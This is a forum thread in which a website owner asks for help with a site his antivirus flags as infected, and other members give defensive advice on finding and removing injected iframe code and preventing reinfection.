SitePoint Sponsor

User Tag List

Results 1 to 9 of 9
  1. #1
    SitePoint Zealot McStompin's Avatar
    Join Date
    Oct 2007
    Location
    Wisconsin, U.S.
    Posts
    112
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    I think I have a virus.

    virus.PNG
    It would appear as though one of my sites has been attacked. When I enter the site, my anitivirus (AVG) displays the picture above.


    When it comes to web development, I would say I have a lot to learn so I would greatly appreciate any input or advice on this matter.
    A community environment where web designers can share their work:
    RateMyWebPage.net
    Check out and review some new and unique websites or submit your own

  2. #2
    Non-Member thewebhostingdir's Avatar
    Join Date
    Oct 2005
    Posts
    703
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Please check the php file show.php on the server. If may have the iframe code injected to it with some lengthy & spuriously encoded strings. Kindly check and let us know if this was the case.

  3. #3
    SitePoint Zealot McStompin's Avatar
    Join Date
    Oct 2007
    Location
    Wisconsin, U.S.
    Posts
    112
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    I took a look and I don't believe I have a show.php in any of my directories. The URL in the attached picture isn't my own. It almost seems like a virus is tunneling through from another site. I have no clue where to start with this one.
    A community environment where web designers can share their work:
    RateMyWebPage.net
    Check out and review some new and unique websites or submit your own

  4. #4
    Non-Member thewebhostingdir's Avatar
    Join Date
    Oct 2005
    Posts
    703
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    There must be the malware contents/iframes added to the website which you are browsing. Website where you get the show.php file in the URL.

  5. #5
    SitePoint Enthusiast
    Join Date
    Jun 2009
    Posts
    30
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    First don't do it in your browser, or at least disable JavaScript and Flash.

    You can start with Google's Safe Browsing Diagnostics: http://www.google.com/safebrowsing/d...ww.example.com (replace www.example.com with your own site address). It will show whether Google found anything suspicious on your site.

    Then you can analyze HTML/script code of your files on server. They should not contain anything that you didn't put there.

    Then scan your server for any suspicious/new files and directories.

    Then look through web server configuration. There could be unwanted redirects and error pages.

    You might also want to take a look at my online tool called Unmask Parasites http://www.UnmaskParasites.com . It analyzes HTTP response and HTML code of web pages and highlights suspicious code (links, scripts, iframes and redirects). Google's Safe Browsing information is also included in Unmask Parasites results. Note, that the tool is still in beta and may not detect every security problem.

  6. #6
    SitePoint Enthusiast
    Join Date
    Aug 2009
    Posts
    75
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    The first question is: how did the malicious software get there? Was it your code or was it the web host not doing the job?

    FTP in, figure out if you have any security vulns in your code. If you are using somebody else's software make sure you have the latest version. Contact the developer, etc.

    If you have vulns in your code, fix them. If not, upload fresh copies of everything from backup to make sure all infections are removed. Then send a message to your web host with all the info. Demand that they take action to stop future hacking attempts.

    Change all the passwords on all of the accounts connected to whatever was attacked. Database passwords, etc.

    Go beyond what your minimal requirement is so this never happens to you again.

  7. #7
    SitePoint Wizard silver trophy Crazybanana's Avatar
    Join Date
    Mar 2003
    Location
    In tha fruit cellar
    Posts
    1,379
    Mentioned
    32 Post(s)
    Tagged
    1 Thread(s)
    you're webpage has been exploited with the "la fiesta" also named "31 fiesta" or "37 fiesta" exploit pack.

    this pack contains 25+ exploits and are targetting Yahoo Messenger, Adobe Reader, Quicktime, DivX, MSDAC and various ActiveX controls

    if you run some CMS, forums or other SW, try to look for updates, but first you have to clean your server properly.

    check all folders and files for suspicious names etc and pay attention to plugins and folders containing plugins as they are a popular place to store malicious files.

    this iframe you have there will trigger various exploits on everyone that visits, and will try to infect as many as possible, so take action as soon as possible.

    Good Luck
    Who's to doom when the judge himself is dragged before the bar


  8. #8
    SitePoint Zealot McStompin's Avatar
    Join Date
    Oct 2007
    Location
    Wisconsin, U.S.
    Posts
    112
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Well, I believe the problem is fixed now. I have multiple web sites in one directory and every index.php and index.html had some "woocasino" iframe code in it. I deleted the code in all the files I found it in and the problem seems to be gone.

    Thank you everyone for your help. I really appreciate it. I didn't even know what an iframe was until now! Also, thanks for the link, Ayme.

    This is very disturbing because I have no idea how it happened in the first place and I fear it may come back. I'll post again if it does. The last thing I want is for any of my visitors to get malicious code because of one of my sites, or to get my sites plagued with warning marks on search engines like Google.

    Thanks again!
    A community environment where web designers can share their work:
    RateMyWebPage.net
    Check out and review some new and unique websites or submit your own

  9. #9
    Community Advisor silver trophy

    Join Date
    Nov 2006
    Location
    UK
    Posts
    2,559
    Mentioned
    40 Post(s)
    Tagged
    1 Thread(s)
    A lot of website injection attacks are now done via ftp (username and passwords are network sniffed by an infection on a user's pc) so you should check ftp logs against file modification times, and change your ftp login and virus scan any pc that has been used to access your ftp account.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •